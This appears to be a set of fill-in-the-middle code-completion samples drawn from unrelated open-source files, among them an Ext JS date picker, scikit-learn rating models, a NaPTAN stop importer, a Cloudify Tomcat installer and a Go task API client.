probably using an uncommon filesystem setup. No problem.\n" % path_new)) # #def _make_writeable(filename): # """ # Make sure that the file is writeable. Useful if our source is # read-only. # # """ # import stat # if sys.platform.startswith('java'): # # On Jython there is no os.access() # return # if not os.access(filename, os.W_OK): # st = os.stat(filename) # new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR # os.chmod(filename, new_permissions)<|fim▁end|>
<|file_name|>Message.js<|end_file_name|><|fim▁begin|>DS.classes.Message = function(create){ var relations = []; //check check(create, { time: DS.classes.Time, data: Match.Optional(Object) }); //create _.extend(this, create); //add relations<|fim▁hole|> this.addRelation = function(relation, reversed){ check(relation, DS.classes.Relation); check(reversed, Boolean); relations.push({ 'relation': relation, 'reversed': reversed }); }; this.getRelations = function(){ return relations; } };<|fim▁end|>
<|file_name|>Compare.rs<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|>
com.hackoeur.jglm.support.Compare
<|file_name|>PlyVertexDataType.java<|end_file_name|><|fim▁begin|>package com.ripplargames.meshio.meshformats.ply; import com.ripplargames.meshio.vertices.VertexType; public class PlyVertexDataType { private final VertexType vertexType;<|fim▁hole|> public PlyVertexDataType(VertexType vertexType, PlyDataType plyDataType) { this.vertexType = vertexType; this.plyDataType = plyDataType; } public VertexType vertexType() { return vertexType; } public PlyDataType plyDataType() { return plyDataType; } }<|fim▁end|>
private final PlyDataType plyDataType;
<|file_name|>DatePicker.js<|end_file_name|><|fim▁begin|>/* This file is part of Ext JS 4.2 Copyright (c) 2011-2013 Sencha Inc Contact: http://www.sencha.com/contact GNU General Public License Usage This file may be used under the terms of the GNU General Public License version 3.0 as published by the Free Software Foundation and appearing in the file LICENSE included in the packaging of this file. Please review the following information to ensure the GNU General Public License version 3.0 requirements will be met: http://www.gnu.org/copyleft/gpl.html. If you are unsure which license is appropriate for your use, please contact the sales department at http://www.sencha.com/contact. Build date: 2013-09-18 17:18:59 (940c324ac822b840618a3a8b2b4b873f83a1a9b1) */ /** * A menu containing an Ext.picker.Date Component. * * Notes: * * - Although not listed here, the **constructor** for this class accepts all of the * configuration options of **{@link Ext.picker.Date}**. * - If subclassing DateMenu, any configuration options for the DatePicker must be applied * to the **initialConfig** property of the DateMenu. Applying {@link Ext.picker.Date Date Picker} * configuration settings to **this** will **not** affect the Date Picker's configuration. * * Example: * * @example * var dateMenu = Ext.create('Ext.menu.DatePicker', { * handler: function(dp, date){ * Ext.Msg.alert('Date Selected', 'You selected ' + Ext.Date.format(date, 'M j, Y')); * } * }); * * Ext.create('Ext.menu.Menu', { * items: [{ * text: 'Choose a date', * menu: dateMenu * },{ * iconCls: 'add16', * text: 'Icon item' * },{ * text: 'Regular item' * }] * }).showAt([5, 5]); */ Ext.define('Ext.menu.DatePicker', { extend: 'Ext.menu.Menu', alias: 'widget.datemenu', requires: [ 'Ext.picker.Date' ], /** * @cfg {Boolean} hideOnClick * False to continue showing the menu after a date is selected. */ hideOnClick : true, /** * @cfg {String} pickerId * An id to assign to the underlying date picker. */ pickerId : null, /** * @cfg {Number} maxHeight * @private */ /** * @property {Ext.picker.Date} picker * The {@link Ext.picker.Date} instance for this DateMenu */ initComponent : function(){ var me = this, cfg = Ext.apply({}, me.initialConfig); // Ensure we clear any listeners so they aren't duplicated delete cfg.listeners; Ext.apply(me, { showSeparator: false, plain: true,<|fim▁hole|> border: false, id: me.pickerId, xtype: 'datepicker' }, cfg) }); me.callParent(arguments); me.picker = me.down('datepicker'); /** * @event select * @inheritdoc Ext.picker.Date#select */ me.relayEvents(me.picker, ['select']); if (me.hideOnClick) { me.on('select', me.hidePickerOnSelect, me); } }, hidePickerOnSelect: function() { Ext.menu.Manager.hideAll(); } });<|fim▁end|>
bodyPadding: 0, // remove the body padding from the datepicker menu item so it looks like 3.3 items: Ext.applyIf({ cls: Ext.baseCSSPrefix + 'menu-date-item', margin: 0,
<|file_name|>models.py<|end_file_name|><|fim▁begin|>import sklearn.cross_validation as cv import sklearn.dummy as dummy from sklearn.mixture import GMM from sklearn.hmm import GMMHMM from sklearn import linear_model, naive_bayes import collections import itertools import pandas as pd from testResults import TestResults from counters import * import utils as utils class Model(): __metaclass__ = ABCMeta params = {} isSklearn = True def __init__(self, params, verbose=False): self.params = params self.verbose = verbose def printv(self, arg, title=None): if self.verbose: if title is not None: print title print arg @property def name(self): return self._name @abstractmethod def _train(self, data): """Returns a trained model.""" pass def _test(self, model, testData, resultObj): """Compares predictions made by specified model against test data. Returns a TestResults object. """ # restrict test data to principal component features features = self.params['features'] test = np.array(testData[features]) # predict a dialog sequence using test data # sklearn counts from 0 so add 1... if self.isSklearn: pred = [int(r) + 1 for r in list(model.predict(test))] else: pred = [int(r) for r in list(model.predict(test))] # extract true ratings from test data true = [int(rating) for rating in testData['rating'].values.tolist()] resultObj.compare(true, pred) return resultObj def loocv(self, data): """Leave-one-out cross validation using given data. Returns a TestResults objects, where results are averages from the cross validation steps. """ mask = cv.LeaveOneLabelOut(data['label'].values) results = TestResults(self.name, verbose=self.verbose) for trainMask, testMask in mask: # training trainingData = data.loc[trainMask] self.printv(trainingData, "training data:") model = self._train(trainingData) # testing testData = data.loc[testMask] self.printv(testData, "test data:") # leave p labels out for label, testGroup in testData.groupby("label"): results = self._test(model, testGroup, results) return results def kfoldscv(self, data, folds): """K-folds cross validation using given data and number of folds. Returns a TestResults objects, where results are averages from the cross validation steps. """ results = TestResults(self.name, verbose=self.verbose) labels = list(np.unique(data['label'].values)) for tr, te in cv.KFold(len(labels), n_folds=folds): trainD = data[data['label'].isin([labels[i] for i in tr])] testD = data[data['label'].isin([labels[i] for i in te])] self.printv(trainD, "training data:") self.printv(testD, "test data:") model = self._train(trainD) for label, testGroup in testD.groupby("label"): results = self._test(model, testGroup, results) return results def setFeatures(self, features): self.params['features'] = features class Dummy(Model): _name = "dummy" def _train(self, data): if 'constant' in self.params.keys(): model = dummy.DummyClassifier(strategy=self.params['strategy'], constant=self.params['constant']) else: model = dummy.DummyClassifier(strategy=self.params['strategy']) d = np.array(zip(*[data[f].values for f in self.params['features']])) y = np.array(data['rating'].values) model.fit(d, y) return model class Gmm(Model): """A Gaussian mixture model. Parameters are number of mixture components (num_mixc) and covariance type (cov_type). Example: model = Gmm(params = {num_mixc: 3, cov_type:'diag'}) """ _name = "GMM" def _train(self, data): """Trains a Gaussian mixture model, using the sklearn implementation.""" # parameters features = self.params['features'] num_mixc = self.params['num_mixc'] cov_type = self.params['cov_type'] # prepare data shape d = np.array(zip(*[data[f].values for f in features])) # choose high number of EM-iterations to get constant results gmm = GMM(num_mixc, cov_type, n_iter=300) gmm.fit(d) return gmm class Gmmhmm(Model): """A hidden Markov model with Gaussian mixture emissions. Parameters are number of mixture components (num_mixc), covariance type (cov_type) and states (states). One Gaussian mixture model is created for each state. Example: model = Gmmhmm(params = {'num_mixc': 3, 'cov_type': 'diag', 'states': [1,2,3,4,5]}) """ _name = "GMM-HMM" def _train(self, data): """Trains a GMMHMM model, using the sklearn implementation and maximum- likelihood estimates as HMM parameters (Hmm.mle(...)). """ # parameters features = self.params['features'] num_mixc = self.params['num_mixc'] cov_type = self.params['cov_type'] states = self.params['states'] # train one GMM for each state mixes = list() for state in states: # select data with current state label d = data[data.rating == state] # prepare data shape d = np.array(zip(*[d[f].values for f in features])) # init GMM gmm = GMM(num_mixc, cov_type) # train gmm.fit(d) mixes.append(gmm) # train HMM with init, trans, GMMs=mixes mle = Hmm.mle(MatrixCounterNoEmissions, data, states) model = GMMHMM(n_components=len(states), init_params='', gmms=mixes) model.transmat_ = mle.transition model.startprob_ = mle.initial return model class Ols(Model): """ Ordinary least squares regression """ _name = "OLS" isSklearn = True def _train(self, data): features = self.params['features'] X = np.array(zip(*[data[f].values for f in features])) y = np.array(data['rating']) model = linear_model.LinearRegression() model.fit(X, y) return model class LogisticRegression(Model): """ Logistic Regression """ _name = "Logit" isSklearn = True def _train(self, data): features = self.params['features'] X = np.array(zip(*[data[f].values for f in features])) y = np.array(data['rating']) model = linear_model.LogisticRegression(class_weight=self.params['class_weight']) model.fit(X, y) return model class GaussianNaiveBayes(Model): """ Gaussian Naive Bayes... """ _name = "G-NB" isSklearn = True def _train(self, data): features = self.params['features'] X = np.array(zip(*[data[f].values for f in features])) y = np.array(data['rating']) model = naive_bayes.GaussianNB() model.fit(X, y) return model class MultinomialNaiveBayes(Model): """ Multinomial Naive Bayes... """ _name = "M-NB" isSklearn = True def _train(self, data): features = self.params['features'] X = np.array(zip(*[data[f].values for f in features])) y = np.array(data['rating']) model = naive_bayes.MultinomialNB(alpha=self.params['alpha'], fit_prior=self.params['fit_prior']) model.fit(X, y) return model class Hmm(Model): """A hidden Markov model, using the Nltk implementation and maximum- likelihood parameter estimates. """ _name = "HMM" isSklearn = False Parameters = collections.namedtuple( 'Parameters', 'initial transition emission emissionAlph') class NltkWrapper(): def __init__(self, states, mle): self.model = nltk.HiddenMarkovModelTagger(mle.emissionAlph, states, mle.transition, mle.emission, mle.initial) def predict(self, obs): tagged = self.model.tag([tuple(o) for o in obs]) return [val[1] for val in tagged] def _train(self, data): features = self.params['features'] states = self.params['states'] # calculate maximum-likelihood parameter estimates mle = Hmm.mle_multipleFeatures(NltkCounter, data, states, features, self.verbose) # create nltk HMM model = Hmm.NltkWrapper(states, mle) return model @staticmethod def mle(counterClass, data, stateAlphabet, feature=False): """ Calculate maximum likelihood estimates for the HMM parameters transitions probabilites, emission probabilites, and initial state probabilites. """ f = feature is not False states = utils.dfToSequences(data, ['rating']) if f: emissionAlphabet = pd.unique(data[feature].values.ravel()) emissions = utils.dfToSequences(data, [feature]) else: emissionAlphabet = None counter = counterClass(stateAlphabet, emissionAlphabet, states) # count for each state sequence for k, seq in enumerate(states): if f: emi = emissions[k] # for each state transition for i, current in enumerate(seq): # count(current, next, first, emission) if f: emission = emi[i] else: emission = False next = seq[i + 1] if i < len(seq) - 1 else False counter.count(i, current, next, emission) return Hmm.Parameters( initial=counter.getInitialProb(), transition=counter.getTransitionProb(), emission=counter.getEmissionProb(), emissionAlph=emissionAlphabet ) @staticmethod def mle_multipleFeatures(counterClass, data, stateAlphabet, features, verbose=False): """ Calculate maximum likelihood estimates of HMM parameters. Parameters are transition probabilites, emission probabilites and initial sta<te probabilites. This method allows specifing multiple features and combines multiple emission features assuming conditional independence: P(feat1=a & feat2=b|state) = P(feat1=a|state) * P(feat2=b|state) """ p = lambda feat: Hmm.mle(DictCounter, data, stateAlphabet, feat) counter = counterClass(stateAlphabet, [], False) # calculate conditional probabilites for each feature & corresponding # emission alphabet entry.. # P(feat_i=emm_ij|state_k) forall: I features, J_i emissions, K states # ps = {feature:emmission distribution} emission_probs = [p(f).emission for f in features] # calculate inital state probabilites, transition probabilites using # first/any feature mle_single = Hmm.mle(counterClass, data, stateAlphabet, features[0]) initial_probs = mle_single.initial transition_probs = mle_single.transition # combine the emission alphabets of all given features emissionAlphabet = list() for f in features: emissionAlphabet.append(pd.unique(data[f].values.ravel())) # calculate all emission combinations # and according probabilities per state for comb in list(itertools.product(*emissionAlphabet)): counter.addEmissionCombination(tuple(comb)) for state in stateAlphabet: # for each individual prob of each feature for emission, featNum in zip(comb, xrange(0, len(emission_probs))): prob = emission_probs[featNum][state][emission] counter.addCombinedEmissionProb(state, tuple(comb), prob) if verbose: print("Initial Probabilities") printDictProbDist(initial_probs) print("Transition Probabilities") printCondDictProbDist(transition_probs) print("Emission Probabilities")<|fim▁hole|> initial=initial_probs, transition=transition_probs, emission=counter.getCombinedEmissionProb(), emissionAlph=counter.getEmissionCombinations() )<|fim▁end|>
printCondDictProbDist(counter.getCombinedEmissionProb()) return Hmm.Parameters(
<|file_name|>import_ie_naptan_xml.py<|end_file_name|><|fim▁begin|>"""Import an Irish NaPTAN XML file, obtainable from https://data.dublinked.ie/dataset/national-public-transport-nodes/resource/6d997756-4dba-40d8-8526-7385735dc345 """ import warnings import zipfile import xml.etree.cElementTree as ET from django.contrib.gis.geos import Point from django.core.management.base import BaseCommand from ...models import Locality, AdminArea, StopPoint class Command(BaseCommand): ns = {'naptan': 'http://www.naptan.org.uk/'} @staticmethod def add_arguments(parser): parser.add_argument('filenames', nargs='+', type=str) def handle_stop(self, element): stop = StopPoint( atco_code=element.find('naptan:AtcoCode', self.ns).text, locality_centre=element.find('naptan:Place/naptan:LocalityCentre', self.ns).text == 'true', active=element.get('Status') == 'active', ) for subelement in element.find('naptan:Descriptor', self.ns): tag = subelement.tag[27:] if tag == 'CommonName': stop.common_name = subelement.text elif tag == 'Street': stop.street = subelement.text elif tag == 'Indicator': stop.indicator = subelement.text.lower() else: warnings.warn('Stop {} has an unexpected property: {}'.format(stop.atco_code, tag)) stop_classification_element = element.find('naptan:StopClassification', self.ns) stop_type = stop_classification_element.find('naptan:StopType', self.ns).text if stop_type != 'class_undefined': stop.stop_type = stop_type bus_element = stop_classification_element.find('naptan:OnStreet/naptan:Bus', self.ns) if bus_element is not None: stop.bus_stop_type = bus_element.find('naptan:BusStopType', self.ns).text stop.timing_status = bus_element.find('naptan:TimingStatus', self.ns).text compass_point_element = bus_element.find( 'naptan:MarkedPoint/naptan:Bearing/naptan:CompassPoint', self.ns ) if compass_point_element is not None: stop.bearing = compass_point_element.text if stop.bus_stop_type == 'type_undefined': stop.bus_stop_type = '' place_element = element.find('naptan:Place', self.ns) location_element = place_element.find('naptan:Location', self.ns)<|fim▁hole|> if longitude_element is None: warnings.warn('Stop {} has no location'.format(stop.atco_code)) else: stop.latlong = Point(float(longitude_element.text), float(latitude_element.text)) admin_area_id = element.find('naptan:AdministrativeAreaRef', self.ns).text if not AdminArea.objects.filter(atco_code=admin_area_id).exists(): AdminArea.objects.create(id=admin_area_id, atco_code=admin_area_id, region_id='NI') stop.admin_area_id = admin_area_id locality_element = place_element.find('naptan:NptgLocalityRef', self.ns) if locality_element is not None: if not Locality.objects.filter(id=locality_element.text).exists(): Locality.objects.create(id=locality_element.text, admin_area_id=admin_area_id) stop.locality_id = locality_element.text stop.save() def handle_file(self, archive, filename): with archive.open(filename) as open_file: iterator = ET.iterparse(open_file) for _, element in iterator: tag = element.tag[27:] if tag == 'StopPoint': self.handle_stop(element) element.clear() def handle(self, *args, **options): for filename in options['filenames']: with zipfile.ZipFile(filename) as archive: for filename in archive.namelist(): self.handle_file(archive, filename)<|fim▁end|>
longitude_element = location_element.find('naptan:Longitude', self.ns) latitude_element = location_element.find('naptan:Latitude', self.ns)
<|file_name|>_a4c_tomcat_install.py<|end_file_name|><|fim▁begin|>from cloudify import ctx from cloudify.exceptions import NonRecoverableError from cloudify.state import ctx_parameters as inputs import subprocess import os import re import sys import time import threading import platform from StringIO import StringIO from cloudify_rest_client import CloudifyClient from cloudify import utils if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https": client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True) else: client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port()) def convert_env_value_to_string(envDict): for key, value in envDict.items(): envDict[str(key)] = str(envDict.pop(key)) def get_host(entity): if entity.instance.relationships: for relationship in entity.instance.relationships: if 'cloudify.relationships.contained_in' in relationship.type_hierarchy: return relationship.target return None def has_attribute_mapping(entity, attribute_name): ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties)) mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None) if mapping_configuration is not None: if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name: return False else: return True return False def process_attribute_mapping(entity, attribute_name, data_retriever_function): # This is where attribute mapping is defined in the cloudify type mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name] ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration)) # If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name # Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET if mapping_configuration['parameters'][0] == 'SELF': return data_retriever_function(entity, mapping_configuration['parameters'][1]) elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships: for relationship in entity.instance.relationships: if mapping_configuration['parameters'][1] in relationship.type_hierarchy: return data_retriever_function(relationship.target, mapping_configuration['parameters'][2]) return "" def get_nested_attribute(entity, attribute_names): deep_properties = get_attribute(entity, attribute_names[0]) attribute_names_iter = iter(attribute_names) next(attribute_names_iter) for attribute_name in attribute_names_iter: if deep_properties is None: return "" else: deep_properties = deep_properties.get(attribute_name, None) return deep_properties def _all_instances_get_nested_attribute(entity, attribute_names): return None def get_attribute(entity, attribute_name):<|fim▁hole|> ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value)) return mapped_value # No mapping exist, try to get directly the attribute from the entity attribute_value = entity.instance.runtime_properties.get(attribute_name, None) if attribute_value is not None: ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id)) return attribute_value # Attribute retrieval fails, fall back to property property_value = entity.node.properties.get(attribute_name, None) if property_value is not None: return property_value # Property retrieval fails, fall back to host instance host = get_host(entity) if host is not None: ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id)) return get_attribute(host, attribute_name) # Nothing is found return "" def _all_instances_get_attribute(entity, attribute_name): result_map = {} # get all instances data using cfy rest client # we have to get the node using the rest client with node_instance.node_id # then we will have the relationships node = client.nodes.get(ctx.deployment.id, entity.node.id) all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id) for node_instance in all_node_instances: prop_value = __recursively_get_instance_data(node, node_instance, attribute_name) if prop_value is not None: ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id, node_instance.id)) result_map[node_instance.id + '_'] = prop_value return result_map def get_property(entity, property_name): # Try to get the property value on the node property_value = entity.node.properties.get(property_name, None) if property_value is not None: ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id)) return property_value # No property found on the node, fall back to the host host = get_host(entity) if host is not None: ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id)) return get_property(host, property_name) return "" def get_instance_list(node_id): result = '' all_node_instances = client.node_instances.list(ctx.deployment.id, node_id) for node_instance in all_node_instances: if len(result) > 0: result += ',' result += node_instance.id return result def get_host_node_name(instance): for relationship in instance.relationships: if 'cloudify.relationships.contained_in' in relationship.type_hierarchy: return relationship.target.node.id return None def __get_relationship(node, target_name, relationship_type): for relationship in node.relationships: if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'): return relationship return None def __has_attribute_mapping(node, attribute_name): ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties)) mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None) if mapping_configuration is not None: if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name: return False else: return True return False def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function): # This is where attribute mapping is defined in the cloudify type mapping_configuration = node.properties['_a4c_att_' + attribute_name] ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration)) # If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name # Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET if mapping_configuration['parameters'][0] == 'SELF': return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1]) elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships: for rel in node_instance.relationships: relationship = __get_relationship(node, rel.get('target_name'), rel.get('type')) if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'): target_instance = client.node_instances.get(rel.get('target_id')) target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id) return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2]) return None def __recursively_get_instance_data(node, node_instance, attribute_name): if __has_attribute_mapping(node, attribute_name): return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data) attribute_value = node_instance.runtime_properties.get(attribute_name, None) if attribute_value is not None: return attribute_value elif node_instance.relationships: for rel in node_instance.relationships: # on rel we have target_name, target_id (instanceId), type relationship = __get_relationship(node, rel.get('target_name'), rel.get('type')) if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'): parent_instance = client.node_instances.get(rel.get('target_id')) parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id) return __recursively_get_instance_data(parent_node, parent_instance, attribute_name) return None else: return None def parse_output(output): # by convention, the last output is the result of the operation last_output = None outputs = {} pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)') for line in output.splitlines(): match = pattern.match(line) if match is None: last_output = line else: output_name = match.group(1) output_value = match.group(2) outputs[output_name] = output_value return {'last_output': last_output, 'outputs': outputs} def execute(script_path, process, outputNames, command_prefix=None, cwd=None): os.chmod(script_path, 0755) on_posix = 'posix' in sys.builtin_module_names env = os.environ.copy() process_env = process.get('env', {}) env.update(process_env) if outputNames is not None: env['EXPECTED_OUTPUTS'] = outputNames if platform.system() == 'Windows': wrapper_path = ctx.download_resource("scriptWrapper.bat") else: wrapper_path = ctx.download_resource("scriptWrapper.sh") os.chmod(wrapper_path, 0755) command = '{0} {1}'.format(wrapper_path, script_path) else: command = script_path if command_prefix is not None: command = "{0} {1}".format(command_prefix, command) ctx.logger.info('Executing: {0} in env {1}'.format(command, env)) process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, cwd=cwd, bufsize=1, close_fds=on_posix) return_code = None stdout_consumer = OutputConsumer(process.stdout) stderr_consumer = OutputConsumer(process.stderr) while True: return_code = process.poll() if return_code is not None: break time.sleep(0.1) stdout_consumer.join() stderr_consumer.join() parsed_output = parse_output(stdout_consumer.buffer.getvalue()) if outputNames is not None: outputNameList = outputNames.split(';') for outputName in outputNameList: ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None))) if return_code != 0: error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code, stdout_consumer.buffer.getvalue(), stderr_consumer.buffer.getvalue()) error_message = str(unicode(error_message, errors='ignore')) ctx.logger.error(error_message) raise NonRecoverableError(error_message) else: ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(), stderr_consumer.buffer.getvalue()) ok_message = str(unicode(ok_message, errors='ignore')) ctx.logger.info(ok_message) return parsed_output class OutputConsumer(object): def __init__(self, out): self.out = out self.buffer = StringIO() self.consumer = threading.Thread(target=self.consume_output) self.consumer.daemon = True self.consumer.start() def consume_output(self): for line in iter(self.out.readline, b''): self.buffer.write(line) self.out.close() def join(self): self.consumer.join() env_map = {} env_map['NODE'] = ctx.node.id env_map['INSTANCE'] = ctx.instance.id env_map['INSTANCES'] = get_instance_list(ctx.node.id) env_map['HOST'] = get_host_node_name(ctx.instance) env_map['TOMCAT_HOME'] = r'/opt/tomcat' env_map['TOMCAT_PORT'] = r'80' env_map['TOMCAT_URL'] = r'http://mirrors.ircam.fr/pub/apache/tomcat/tomcat-8/v8.0.29/bin/apache-tomcat-8.0.29.tar.gz' new_script_process = {'env': env_map} ctx.logger.info('Operation is executed with inputs {0}'.format(inputs)) if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None: ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env'])) new_script_process['env'].update(inputs['process']['env']) operationOutputNames = None convert_env_value_to_string(new_script_process['env']) parsed_output = execute(ctx.download_resource('artifacts/tomcat-war-types/scripts/tomcat_install.sh'), new_script_process, operationOutputNames) for k,v in parsed_output['outputs'].items(): ctx.logger.info('Output name: {0} value: {1}'.format(k, v)) ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:create:{0}'.format(k)] = v ctx.instance.runtime_properties['server_url'] = r'http://' + get_attribute(ctx, 'public_ip_address') + r':' + r'80' ctx.instance.update()<|fim▁end|>
if has_attribute_mapping(entity, attribute_name): # First check if any mapping exist for attribute mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
<|file_name|>test-aggregate-pipeline.js<|end_file_name|><|fim▁begin|>var insert = require('./insert') var concat = require('concat-stream') insert('aggregate', [{ name: 'Squirtle', type: 'water' }, { name: 'Starmie', type: 'water' }, { name: 'Charmander', type: 'fire' }, { name: 'Lapras', type: 'water' }], function (db, t, done) { db.a.aggregate([{$group: {_id: '$type'}}, {$project: { _id: 0, foo: '$_id' }}], function (err, types) { console.log(err, types) var arr = types.map(function (x) {return x.foo}) console.log('arr', arr) t.equal(types.length, 2) console.log('here') t.notEqual(arr.indexOf('fire'), -1) console.log('there') t.notEqual(arr.indexOf('water'), -1) console.log('where') // test as a stream var strm = db.a.aggregate([{$group: {_id: '$type'}}, {$project: {_id: 0, foo: '$_id'}}]) strm.pipe(concat(function (types) { var arr = types.map(function (x) {return x.foo}) t.equal(types.length, 2) t.notEqual(arr.indexOf('fire'), -1) t.notEqual(arr.indexOf('water'), -1)<|fim▁hole|> t.end() })) strm.on('error', function (err) { // Aggregation cursors are only supported on mongodb 2.6+ // this shouldn't fail the tests for other versions of mongodb if (err.message === 'unrecognized field "cursor') t.ok(1) else t.fail(err) t.end() }) }) })<|fim▁end|>
<|file_name|>client.go<|end_file_name|><|fim▁begin|>package client import ( "context" "net/http" "github.com/tidepool-org/platform/errors" "github.com/tidepool-org/platform/page" "github.com/tidepool-org/platform/platform" "github.com/tidepool-org/platform/request" structureValidator "github.com/tidepool-org/platform/structure/validator" "github.com/tidepool-org/platform/task" ) type Client struct { client *platform.Client } func New(cfg *platform.Config, authorizeAs platform.AuthorizeAs) (*Client, error) { clnt, err := platform.NewClient(cfg, authorizeAs) if err != nil { return nil, err } return &Client{ client: clnt, }, nil } func (c *Client) ListTasks(ctx context.Context, filter *task.TaskFilter, pagination *page.Pagination) (task.Tasks, error) { if ctx == nil { return nil, errors.New("context is missing") } if filter == nil { filter = task.NewTaskFilter() } else if err := structureValidator.New().Validate(filter); err != nil { return nil, errors.Wrap(err, "filter is invalid") } if pagination == nil { pagination = page.NewPagination() } else if err := structureValidator.New().Validate(pagination); err != nil { return nil, errors.Wrap(err, "pagination is invalid") } url := c.client.ConstructURL("v1", "tasks") tsks := task.Tasks{} if err := c.client.RequestData(ctx, http.MethodGet, url, []request.RequestMutator{filter, pagination}, nil, &tsks); err != nil { return nil, err } return tsks, nil } func (c *Client) CreateTask(ctx context.Context, create *task.TaskCreate) (*task.Task, error) { if ctx == nil { return nil, errors.New("context is missing") } if create == nil { return nil, errors.New("create is missing") } else if err := structureValidator.New().Validate(create); err != nil { return nil, errors.New("create is invalid") } url := c.client.ConstructURL("v1", "tasks") tsk := &task.Task{} if err := c.client.RequestData(ctx, http.MethodPost, url, nil, create, tsk); err != nil { return nil, err } return tsk, nil } func (c *Client) GetTask(ctx context.Context, id string) (*task.Task, error) { if ctx == nil { return nil, errors.New("context is missing") } if id == "" { return nil, errors.New("id is missing") } url := c.client.ConstructURL("v1", "tasks", id) tsk := &task.Task{} if err := c.client.RequestData(ctx, http.MethodGet, url, nil, nil, tsk); err != nil { if request.IsErrorResourceNotFound(err) { return nil, nil } return nil, err } return tsk, nil } func (c *Client) UpdateTask(ctx context.Context, id string, update *task.TaskUpdate) (*task.Task, error) { if ctx == nil { return nil, errors.New("context is missing") } if id == "" { return nil, errors.New("id is missing") } if update == nil { return nil, errors.New("update is missing") } else if err := structureValidator.New().Validate(update); err != nil { return nil, errors.Wrap(err, "update is invalid") } url := c.client.ConstructURL("v1", "tasks", id) tsk := &task.Task{} if err := c.client.RequestData(ctx, http.MethodPut, url, nil, update, tsk); err != nil { if request.IsErrorResourceNotFound(err) { return nil, nil<|fim▁hole|> } return nil, err } return tsk, nil } func (c *Client) DeleteTask(ctx context.Context, id string) error { if ctx == nil { return errors.New("context is missing") } if id == "" { return errors.New("id is missing") } url := c.client.ConstructURL("v1", "tasks", id) return c.client.RequestData(ctx, http.MethodDelete, url, nil, nil, nil) }<|fim▁end|>
<|file_name|>ItemValueBuilder.java<|end_file_name|><|fim▁begin|>package com.amee.domain.data.builder.v2; import com.amee.base.utils.XMLUtils; import com.amee.domain.Builder; import com.amee.domain.ItemBuilder; import com.amee.domain.ItemService; import com.amee.domain.TimeZoneHolder; import com.amee.domain.item.BaseItemValue; import com.amee.domain.item.NumberValue; import com.amee.platform.science.StartEndDate; import org.json.JSONException; import org.json.JSONObject; import org.w3c.dom.Document; import org.w3c.dom.Element; <|fim▁hole|> private BaseItemValue itemValue; private ItemBuilder itemBuilder; private ItemService itemService; public ItemValueBuilder(BaseItemValue itemValue, ItemService itemService) { this.itemValue = itemValue; this.itemService = itemService; } public ItemValueBuilder(BaseItemValue itemValue, ItemBuilder itemBuilder, ItemService itemService) { this(itemValue, itemService); this.itemBuilder = itemBuilder; } public JSONObject getJSONObject() throws JSONException { return getJSONObject(true); } public JSONObject getJSONObject(boolean detailed) throws JSONException { JSONObject obj = new JSONObject(); obj.put("uid", itemValue.getUid()); obj.put("path", itemValue.getPath()); obj.put("name", itemValue.getName()); obj.put("value", itemValue.getValueAsString()); if (NumberValue.class.isAssignableFrom(itemValue.getClass())) { NumberValue numberValue = (NumberValue) itemValue; obj.put("unit", numberValue.getUnit()); obj.put("perUnit", numberValue.getPerUnit()); } else { obj.put("unit", ""); obj.put("perUnit", ""); } obj.put("startDate", StartEndDate.getLocalStartEndDate(itemService.getStartDate(itemValue), TimeZoneHolder.getTimeZone()).toString()); obj.put("itemValueDefinition", itemValue.getItemValueDefinition().getJSONObject(false)); obj.put("displayName", itemValue.getDisplayName()); obj.put("displayPath", itemValue.getDisplayPath()); 